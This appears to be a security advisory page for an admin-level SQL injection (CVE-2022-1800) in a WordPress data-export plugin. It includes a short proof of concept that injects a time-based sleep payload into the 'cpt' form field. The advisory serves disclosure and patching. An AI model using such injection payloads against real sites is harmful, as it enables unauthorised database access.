Lucene search
Asif Nawaz MinhasWPVDB-ID:4267109C-0CA2-441D-889D-FB39C235F128HistoryMay 20, 2022 - 12:00 a.m.
Export any WordPress data to XML/CSV < 1.3.5 - Admin+ SQL Injection
2022-05-2000:00:00
Asif Nawaz Minhas
wpscan.com
11
wordpress
xml
csv
sql injection
admin
vulnerability
database query
EPSS
0.001
Percentile
37.7%
The plugin does not sanitize the cpt POST parameter when exporting post data before using it in a database query, leading to an SQL injection vulnerability.
PoC
1. Go to the All Export > New Export screen in the WordPress admin. 2. Now click on Specific Post Type > Posts. 3. Click now on Migrate Posts and intercept this request and look for the name cpt: Content-Disposition: form-data; name=“cpt” post Change it to: Content-Disposition: form-data; name=“cpt” post’+(select*from(select(sleep(10)))a)+’ Now you will see a later response of 10 seconds, thus confirming the authenticity of the sqli vulnerability.
Related
cvelist
cvelist
patchstack
patchstack
cnvd
cnvd
WordPress Export any WordPress data to XML/CSV plugin SQL注入漏洞
2022-06-15 00:00:00
nvd
nvd
CVE-2022-1800
2022-06-13 13:15:13
cve
cve
CVE-2022-1800
2022-06-13 13:15:13
prion
prion
Sql injection
2022-06-13 13:15:00
wpexploit
wpexploit
Export any WordPress data to XML/CSV < 1.3.5 - Admin+ SQL Injection
2022-05-20 00:00:00